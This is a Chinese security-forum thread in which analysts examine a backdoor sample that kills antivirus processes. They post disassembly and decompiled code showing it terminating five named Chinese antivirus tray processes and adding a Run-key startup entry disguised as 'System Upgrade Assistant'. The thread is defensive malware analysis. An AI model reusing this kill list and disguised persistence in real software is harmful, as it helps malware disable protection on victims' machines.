Backdoor/AV-Killer（？） 2X

wowocock

wwwab 发表于 2024-1-6 10:02
不是驱动，没有看见有驱动，不然有驱动加载的话也过不了360核晶，应该是通过其他方式R3强杀核晶360Tray.e ...

应该是没开核晶吧，看了下，从网上下载DLL,内存加载，对于指定进程
.text:1000EADF                 mov     ecx, offset a360trayExe ; "360Tray.exe"
.text:1000EAE4                 call    sub_1000E350
.text:1000EAE9                 mov     ecx, offset aKxetrayExe ; "kxetray.exe"
.text:1000EAEE                 call    sub_1000E350
.text:1000EAF3                 mov     ecx, offset aQqpctrayExe ; "QQPCTray.exe"
.text:1000EAF8                 call    sub_1000E350
.text:1000EAFD                 mov     ecx, offset aHipstrayExe ; "HipsTray.exe"
.text:1000EB02                 call    sub_1000E350
.text:1000EB07                 mov     ecx, offset a2345safetrayEx ; "2345SafeTray.exe"
.text:1000EB0C                 call    sub_1000E350
降权，所有线程发送退出消息，及杀进程，然后写开机启动。如果开了核晶，应该不会受影响。
LSTATUS sub_1000E850()
{
  LSTATUS result; // eax
  DWORD cbData; // [esp+8h] [ebp-530h] BYREF
  HKEY phkResult; // [esp+Ch] [ebp-52Ch] BYREF
  CHAR Filename[264]; // [esp+10h] [ebp-528h] BYREF
  BYTE Data[520]; // [esp+118h] [ebp-420h] BYREF
  char Buffer[264]; // [esp+320h] [ebp-218h] BYREF
  CHAR pszPath[268]; // [esp+428h] [ebp-110h] BYREF

  SHGetFolderPathA(0, 5, 0, 0, pszPath);
  GetModuleFileNameA(0, Filename, 0x104u);
  sprintf_s(Buffer, 0x104u, "%s\\msedge.exe", pszPath);
  sprintf_s((char *const)Data, 0x208u, "explorer \"%s\"", Buffer);
  if ( !RegOpenKeyExA(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 0x20019u, &phkResult) )
  {
    cbData = 0;
    if ( !RegQueryValueExA(phkResult, "System Upgrade Assistant", 0, 0, 0, &cbData) )
      return RegCloseKey(phkResult);
    RegCloseKey(phkResult);
  }
  OutputDebugStringA("meiyou");
  result = RegOpenKeyExA(
             HKEY_LOCAL_MACHINE,
             "Software\\Microsoft\\Windows\\CurrentVersion\\Run",
             0,
             0x20006u,
             &phkResult);
  if ( !result )
  {
    KillProcByName();
    KillProcByName();
    KillProcByName();
    KillProcByName();
    KillProcByName();
    RegSetValueExA(phkResult, "System Upgrade Assistant", 0, 1u, Data, strlen((const char *)Data));
    return RegCloseKey(phkResult);
  }
  return result;
}

wowocock

BTW,IDA有BUG,F5出来的函数，参数都没了
.text:1000E96D                 mov     ecx, offset a360trayExe ; "360Tray.exe"
.text:1000E972                 call    KillProcByName
.text:1000E977                 mov     ecx, offset aKxetrayExe ; "kxetray.exe"
.text:1000E97C                 call    KillProcByName
.text:1000E981                 mov     ecx, offset aQqpctrayExe ; "QQPCTray.exe"
.text:1000E986                 call    KillProcByName
.text:1000E98B                 mov     ecx, offset aHipstrayExe ; "HipsTray.exe"
.text:1000E990                 call    KillProcByName
.text:1000E995                 mov     ecx, offset a2345safetrayEx ; "2345SafeTray.exe"
.text:1000E99A                 call    KillProcByName

wowocock

wowocock 发表于 2024-1-8 10:51
BTW,IDA有BUG,F5出来的函数，参数都没了
.text:1000E96D                 mov     ecx, offset a36 ...

可能对32位下的FASTCALL调用上，没识别，一律当做STDCALL处理了。

wwwab

wowocock 发表于 2024-1-8 10:47
应该是没开核晶吧，看了下，从网上下载DLL,内存加载，对于指定进程
.text:1000EADF                 mov ...

开着核晶被杀的

tdsskiller

wwwab 发表于 2024-1-8 11:29
开着核晶被杀的

有这么厉害？

hhjjjjjj123

tdsskiller 发表于 2024-1-8 12:00
有这么厉害？

一直都有这种对抗安软的样本，卡巴被kill也不稀奇

tdsskiller

hhjjjjjj123 发表于 2024-1-8 12:22
一直都有这种对抗安软的样本，卡巴被kill也不稀奇

r3杀带有vm保护的杀软，像360和卡巴都是很罕见的。最常见的都是漏洞驱动或者模拟键鼠杀，这种r3直接杀的在好几年前都已经行不通了，除非现在有对杀软进行非常仔细的hook逆向的组织

hhjjjjjj123

tdsskiller 发表于 2024-1-8 15:39
r3杀带有vm保护的杀软，像360和卡巴都是很罕见的。最常见的都是漏洞驱动或者模拟键鼠杀，这种r3直接杀的 ...

我今年遇到过四次，期中两次是远控木马过杀软以后持续驻留下载的风险工具，楼主上次发的一个样本也可以结束包括360在内某些安软。只有一次是加载驱动了，发现一个未知驱动好几g

wowocock

tdsskiller 发表于 2024-1-8 12:00
有这么厉害？

可能主防有点问题，让他们去修改了。

祸兮福所倚